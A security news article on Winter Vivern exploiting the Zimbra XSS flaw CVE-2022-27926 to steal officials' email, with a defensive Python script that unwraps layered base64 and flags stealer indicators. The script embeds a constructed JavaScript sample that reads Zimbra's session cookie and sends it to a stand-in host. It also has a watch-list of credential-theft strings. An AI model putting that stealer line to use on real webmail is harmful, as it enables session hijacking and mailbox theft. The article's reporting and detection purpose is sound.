Winter Vivern steals government emails through a Zimbra vulnerability

    The researchers conclude that the attackers succeeded only because the targets' security teams neglected a patch that had been available for months.

    The threat group tracked as TA473, better known as Winter Vivern, which researchers suspect is Russia-aligned, has been actively exploiting unpatched Zimbra Collaboration instances since February 2023 to steal email from NATO officials, governments, military personnel and diplomats.

    Two weeks ago, SentinelLabs reported on a recent Winter Vivern operation that used websites impersonating European cybercrime agencies to distribute malware.

    Proofpoint today published a new report describing how the attackers exploit CVE-2022-27926 on Zimbra Collaboration servers to read the communications of NATO-related organizations and individuals.

    A Winter Vivern attack starts with a scan for unpatched Zimbra instances (servers not updated to the latest patch level) using the Acunetix vulnerability scanner. The attackers then send a phishing email from a previously compromised address, crafted so that the victim believes it comes from a friend or colleague.


    The email contains a link that triggers CVE-2022-27926, a reflected cross-site scripting (XSS) flaw in the vulnerable Zimbra instance, to inject attacker-controlled JavaScript into the webmail page. That script then steals usernames, passwords and session tokens from the cookies issued by the compromised Zimbra endpoint, giving the attackers unrestricted access to the targets' mailboxes. "These CSRF JavaScript code blocks are executed by the server hosting a vulnerable webmail instance," Proofpoint explains in its report.


    On top of the three layers of base64 encoding applied to the malicious JavaScript to complicate analysis, Winter Vivern also mixes its code with fragments of legitimate JavaScript, so that the payload blends in with normal page operations and is less likely to be detected.
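    The two tricks described above, nested base64 and padding with benign code, are cheap to undo once you know to look for them. The following triage script is an added example written for this article, not Proofpoint's tooling or anything recovered from the campaign: it peels base64 layers off a suspected payload until plain JavaScript emerges, then flags the strings a webmail credential stealer needs. The indicator list is an assumption chosen for the example (ZM_AUTH_TOKEN is Zimbra's real session-cookie name), and the sample payload is constructed inline, with attacker.invalid as a hypothetical, non-resolving collector host.

```python
"""Triage helper for layered-base64 JavaScript (added example, not Proofpoint's tooling).

Winter Vivern wrapped its cookie-stealing JavaScript in three layers of base64
and padded it with legitimate-looking code. This script peels the layers off
and flags the credential-theft indicators that survive the unwrapping.
"""
import base64
import binascii
import re

# Watch-list of strings a webmail credential stealer usually needs.
# Assumption: generic indicators chosen for this example, not a list
# published in the report. ZM_AUTH_TOKEN is Zimbra's session cookie.
INDICATORS = (
    "document.cookie",
    "ZM_AUTH_TOKEN",
    "XMLHttpRequest",
    "fetch(",
    "encodeURIComponent",
    "password",
)

# Base64 alphabet plus whitespace; anything else means we reached plaintext JS.
_B64_RE = re.compile(r"[A-Za-z0-9+/=\s]+")


def peel_base64(blob: str, max_layers: int = 8) -> tuple[str, int]:
    """Decode base64 repeatedly until the result is no longer base64-shaped.

    Returns (innermost_text, layers_removed). Stops on a padding error or on
    bytes that are not UTF-8, so a binary stage is returned as-is rather than
    mangled. max_layers guards against pathological input.
    """
    text = blob.strip()
    layers = 0
    while layers < max_layers and text and _B64_RE.fullmatch(text):
        compact = "".join(text.split())  # b64decode(validate=True) rejects whitespace
        try:
            decoded = base64.b64decode(compact, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        text = decoded.strip()
        layers += 1
    return text, layers


def find_indicators(script: str) -> list[str]:
    """Return the watch-list entries present in the decoded script."""
    return [needle for needle in INDICATORS if needle in script]


def analyze(blob: str) -> dict:
    """Peel the sample and decide whether it looks like an obfuscated stealer.

    The verdict requires both nesting (legitimate pages rarely ship JavaScript
    wrapped in two or more base64 layers) and at least one theft indicator,
    so benign code that merely mentions cookies is not flagged.
    """
    script, layers = peel_base64(blob)
    hits = find_indicators(script)
    return {
        "layers": layers,
        "indicators": hits,
        "suspicious": layers >= 2 and bool(hits),
    }


def wrap_base64(script: str, layers: int = 3) -> str:
    """Apply `layers` rounds of base64 (used here only to build the sample)."""
    data = script.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


# Constructed sample: a harmless-looking helper followed by a cookie stealer
# that beacons ZM_AUTH_TOKEN to a hypothetical collector. attacker.invalid is
# a reserved name and never resolves.
SAMPLE_JS = (
    'function pad(n){return n<10?"0"+n:String(n);}\n'
    'var t=document.cookie.match(/ZM_AUTH_TOKEN=([^;]+)/);\n'
    'if(t){new Image().src="https://attacker.invalid/c?t="+encodeURIComponent(t[1]);}'
)
SAMPLE_PAYLOAD = wrap_base64(SAMPLE_JS, 3)

if __name__ == "__main__":
    report = analyze(SAMPLE_PAYLOAD)
    print(f"layers removed: {report['layers']}")
    print(f"indicators: {report['indicators']}")
    print(f"suspicious: {report['suspicious']}")
    print(analyze("function f(){return 1;}"))
```

    Run it as-is to see the constructed sample unwrap to three layers and trip the cookie and token indicators; point `analyze()` at a blob pulled from a phishing link or a proxy log to triage real samples. Requiring two or more layers keeps single-encoded inline data (common in legitimate pages) below the threshold.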


    Finally, the attackers can read sensitive information in the compromised webmail portals and retain access to the mailboxes for an extended period. They can also use the hijacked accounts for lateral phishing to penetrate deeper into the targeted organizations.

    Although the researchers note that Winter Vivern does not use particularly sophisticated techniques, the group follows an efficient operational playbook that works even against high-profile targets. Its latest campaigns are a clear lesson in why software updates should not be postponed: the attackers exploited a vulnerability that was fixed in Zimbra Collaboration 9.0.0 Patch 24, released 10 months earlier, in April 2022.

    Author DeepWeb